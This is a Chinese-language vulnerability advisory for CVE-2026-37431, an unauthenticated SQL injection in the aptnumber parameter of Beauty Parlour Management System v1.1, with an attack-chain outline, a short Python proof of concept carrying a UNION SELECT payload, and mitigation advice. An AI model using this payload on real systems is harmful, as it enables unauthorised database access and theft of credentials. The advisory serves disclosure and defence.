CVE-2026-37431 Beauty Parlour Management System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-37431

漏洞类型

SQL注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Beauty Parlour Management System

漏洞概述

Beauty Parlour Management System v1.1被披露存在严重的SQL注入漏洞。该漏洞位于/appointment-detail.php端点，由于未对aptnumber参数进行严格的过滤和验证，导致攻击者无需认证即可通过构造恶意SQL语句来访问敏感数据库信息。CVSS评分9.8，对数据机密性、完整性和可用性构成极高威胁。

技术细节

该漏洞的根本原因是应用程序在处理用户输入时缺乏安全编码实践。具体而言，在Beauty Parlour Management System v1.1的/appointment-detail.php接口中，`aptnumber`参数被直接拼接到SQL查询语句中执行，导致经典的基于错误的SQL注入或联合查询注入。攻击者可以通过发送包含SQL元字符（如单引号）的HTTP请求，绕过应用逻辑，直接操纵后端数据库。由于CVSS向量显示无需用户交互（UI:N）且无需权限（PR:N），远程匿名攻击者可利用此漏洞读取管理员密码、用户数据等敏感信息，甚至在特定条件下写入WebShell或执行系统命令，完全控制服务器。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是Beauty Parlour Management System v1.1，并定位到/appointment-detail.php接口。

STEP 2

武器化

攻击者构造针对MySQL数据库的SQL注入Payload（如UNION SELECT语句），旨在提取数据库凭证或敏感数据。

STEP 3

投递

攻击者向目标服务器发送特制的HTTP GET或POST请求，将恶意Payload注入到aptnumber参数中。

STEP 4

利用

后端数据库执行了攻击者注入的恶意SQL语句，将查询结果返回给攻击者或写入日志文件。

STEP 5

达成目标

攻击者成功获取数据库敏感信息，可能进一步利用获取的信息登录后台或获取服务器权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-37431
# Description: SQL Injection via 'aptnumber' parameter in /appointment-detail.php

target_url = "http://target-ip/appointment-detail.php"
payload = "1' UNION SELECT 1, user(), database(), version()--+"

params = {
    "aptnumber": payload
}

try:
    response = requests.get(target_url, params=params, timeout=5)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check the response for database details (user, db, version).")
        # print(response.text) # Uncomment to debug response
    else:
        print("[-] Target did not respond as expected.")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Beauty Parlour Management System v1.1

防御指南

临时缓解措施

在官方补丁发布前，建议通过修改代码逻辑，对`aptnumber`参数强制进行整数类型转换（例如使用(int)$_GET['aptnumber']），或者在前端和后端同时实施严格的输入白名单验证机制。同时，应在网络边界设备上阻断对该端口的非必要访问。